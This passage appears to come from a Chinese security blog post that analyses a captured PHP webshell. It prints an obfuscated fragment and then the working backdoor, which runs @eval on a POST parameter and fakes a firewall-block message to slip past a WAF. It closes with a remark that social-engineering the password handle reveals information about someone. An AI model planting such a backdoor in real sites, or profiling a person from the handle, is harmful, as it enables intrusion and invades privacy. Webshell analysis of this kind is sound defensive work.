$CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [26 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [30 ];$DMxquRQyJeosinKFbvlTrjmgXcwtpkHPOGzdZAhSEVaILCfNBYWU = "idsoLMvEgDNkAjIXPVpqTSFbtzWRxuJBeHOCrZYmQclGKwayUhnfgJSyWKekjItNXarMiUQmsubCBdfRPHFclAvpEzTDOxqhLoZwYVnGiI9oZAXjznUHT3RQC24jJhUdJpjNTuq7ZfTjLhUBxAR5LpRVLuq7Fhk9rDUaZh8jFwTaKdj0tsX7FgKwvIx3vsSDrdrwtajPvwTaKaYdKsj7FgKwtskdKISnvwr7rA1XzMzVCpjNTuN7GYc0zMt0LpRGYk9sUbSnZAVPvsNPKak3F10Qvd8+" ;?> <?php function test ($a ) { if (empty ($a )) { $a = "echo '防火墙拦截';" ; } @eval ($a ); } @test ($_POST ['hxq991217' ]);?>
有用的只有这个:
1 2 3 4 5 6 7 8 9 10
<?php function test ($a ) { if (empty ($a )) { $a = "echo '防火墙拦截;';" ; } @eval ($a ); } @test ($_POST ['hxq991217' ]);?>
为了过 waf 真的是什么写法都有(摊手
最后,对 hxq991217
进行社工可以找到一些信息,是不是这个人就不知道了
- By:tr0y.wang
评论